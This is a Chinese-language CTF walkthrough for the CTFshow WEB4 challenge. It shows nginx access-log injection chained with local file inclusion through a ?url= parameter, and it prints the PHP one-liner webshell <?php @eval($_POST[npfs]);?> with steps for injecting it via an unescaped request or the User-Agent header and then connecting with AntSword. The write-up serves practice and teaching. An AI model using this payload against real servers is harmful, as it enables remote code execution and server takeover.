zoukankan      html  css  js  c++  java
  • 日志注入漏洞

    靶机:CTFshow WEB4

    漏洞测试

    1.输入进行测试

    2.查看相应日志文件,在本题中文件日志默认地址为/var/log/nginx/access.log

    (可通过抓包查看得知服务器为Ubuntu,由nginx搭建的网站,nginx的日志文件默认地址在/var/log/nginx/access.log和/var/log/nginx/error.log,其中本题中access.log可以打开)

    ?url=/var/log/nginx/access.log,查看文件日志,发现刚刚get的phpinfo存在日志里,且被转义

    3.重新Get 并进行抓包

    将这里的%3C?php%20phpinfo();?%3E改成<?php phpinfo();?>

    修改之后放包,再去文件包含日志文件,发现已被执行

    4.由此判断存在日志注入漏洞

    法一

    1.输入一句话木马<?php @eval($_POST[npfs]);?>

    2.抓包将转义后的<?php @eval($_POST[npfs]);?>修改回来,放包(实际做法,如上面所述)

    3.访问日志文件,查看存在一句话木马内容,说明一句话木马被当作php语言正常解析

    4.蚁剑连接

    flag在根目录下的www的flag.txt文件中

    法二

    1.url :?url=/var/log/nginx/access.log,抓包

    2.利用 user-agent 插入 payload 到日志文件

    1. 放包,蚁剑连接

    flag在根目录下的www的flag.txt文件中

  • 相关阅读:
    django-form表单
    django-登录页面添加验证码
    opensatck误删除service项目
    运维脚本
    大数据平台架构组件选择与运用场景
    HDP2.4安装(五):集群及组件安装
    Spark(三): 安装与配置
    Spark(二): 内存管理
    Spark(一): 基本架构及原理
    ElasticSearch基本使用
  • 原文地址:https://www.cnblogs.com/NPFS/p/13235425.html
Copyright © 2011-2022 走看看